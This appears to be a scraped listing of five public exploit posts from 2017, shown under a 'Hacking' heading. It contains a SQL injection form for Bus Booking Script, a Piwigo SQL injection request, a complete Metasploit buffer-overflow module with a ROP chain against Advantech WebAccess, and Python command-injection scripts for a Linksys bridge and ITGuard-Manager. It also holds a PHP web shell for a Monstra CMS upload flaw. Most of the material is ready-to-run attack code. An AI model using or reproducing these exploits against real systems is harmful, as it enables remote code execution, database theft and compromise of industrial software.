    <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
  21. Hacking

    # # # # # # Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://piwigo.org/ # Software Link: http://piwigo.org/basics/downloads # Version: <= 2.9.1 # Category: Webapps # Tested on: WiN7_x64/WIN10_X64 # CVE: CVE-2017-10682 # # # # # # Exploit Author: Akityo # Email: [email protected] # # # # # # Description: # # SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter # in the comments or status page to cat_options.php. # # # # # # # # Proof-of-Concent: # # POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1 # Host: www.test.com # Content-Length: 34 # Cache-Control: max-age=0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 # Upgrade-Insecure-Requests: 1 # User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 # Content-Type: application/x-www-form-urlencoded # Accept-Encoding: gzip, deflate # Accept-Language: zh-CN,zh;q=0.8 # Cookie: null # Connection: close # # cat_false%5B%5D=[payload here]&trueify=%C2%AB # # # # # # #
  22. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
  23. Hacking

    #!/usr/bin/python # -*- coding: utf-8 -*- # Author: Nixawk # CVE-2017-17411 # Linksys WVBR0 25 Command Injection """ $ python2.7 exploit-CVE-2017-17411.py [*] Usage: python exploit-CVE-2017-17411.py <URL> $ python2.7 exploit-CVE-2017-17411.py http://example.com/ [+] Target is exploitable by CVE-2017-17411 """ import requests def check(url): payload = '"; echo "admin' md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum resp = send_http_request(url, payload) if not resp: return False lines = resp.text.splitlines() sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines) if not any([payload in sys_cmd for sys_cmd in sys_cmds]): return False if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]): return False print("[+] Target is exploitable by CVE-2017-17411 ") return True def send_http_request(url, payload): headers = { 'User-Agent': payload } response = None try: response = requests.get(url, headers=headers) except Exception as err: log.exception(err) return response if __name__ == '__main__': import sys if len(sys.argv) != 2: print("[*] Usage: python %s <URL>" % sys.argv[0]) sys.exit(0) check(sys.argv[1]) # google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US" ## References # https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair # https://thehackernews.com/2017/12/directv-wvb-hack.html
  24. Hacking

    # Vulnerability Title: ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution # Author: Nassim Asrir # Contact: [email protected] / @asrir_nassim # CVE: Waiting ... # CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P # Vendor: http://www.innotube.com Details: ======== First we need to know what happens when we need to LogIn. When the User or Attacker insert any strings in the login form he/she will get this POST request: POST /cgi-bin/drknow.cgi?req=login HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://server/log-in.html?lang=KOR Content-Type: application/x-www-form-urlencoded Content-Length: 45 Connection: close Upgrade-Insecure-Requests: 1 req=login&lang=KOR&username=admin&password=admin Ok now we have this POST request and all we care about is the ‘username’ parameter . and we can execute our system commands via this parameter due to missing input sanitization. The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls – id – mkdir ….) Exploit: ======= #i am not responsible for any wrong use. import requests target = raw_input('Target(With proto) : ') command = raw_input('Command To Execute : ') fullpath=target +"/cgi-bin/drknow.cgi?req=login" data = {'req':'login', 'lang':'ENG', 'username':'admin|'+command+'||x', 'password':'admin'} execute = requests.post(fullpath, data = data) print execute.text
  25. Exploit Title: Monstra CMS - 3.0.4 RCE Vendor Homepage: http://monstra.org/ Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip Discovered by: Ishaq Mohammed Contact: https://twitter.com/security_prince Website: https://about.me/security-prince Category: webapps Platform: PHP Advisory Link: https://blogs.securiteam.com/index.php/archives/3559 Description: MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a remote command execution on the remote server. Vulnerable Code: https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php line 19: public static function main() { // Array of forbidden types $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'); Proof of Concept Steps to Reproduce: 1. Login with a valid credentials of an Editor 2. Select Files option from the Drop-down menu of Content 3. Upload a file with PHP (uppercase)extension containing the below code: <?php $cmd=$_GET['cmd']; system($cmd); ?> 4. Click on Upload 5. Once the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc. Recommended Patch: We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the GitHub appears a bit more active (last commit from 2 years ago). The patch that addresses this bug is available here: https://github.com/monstra-cms/monstra/issues/426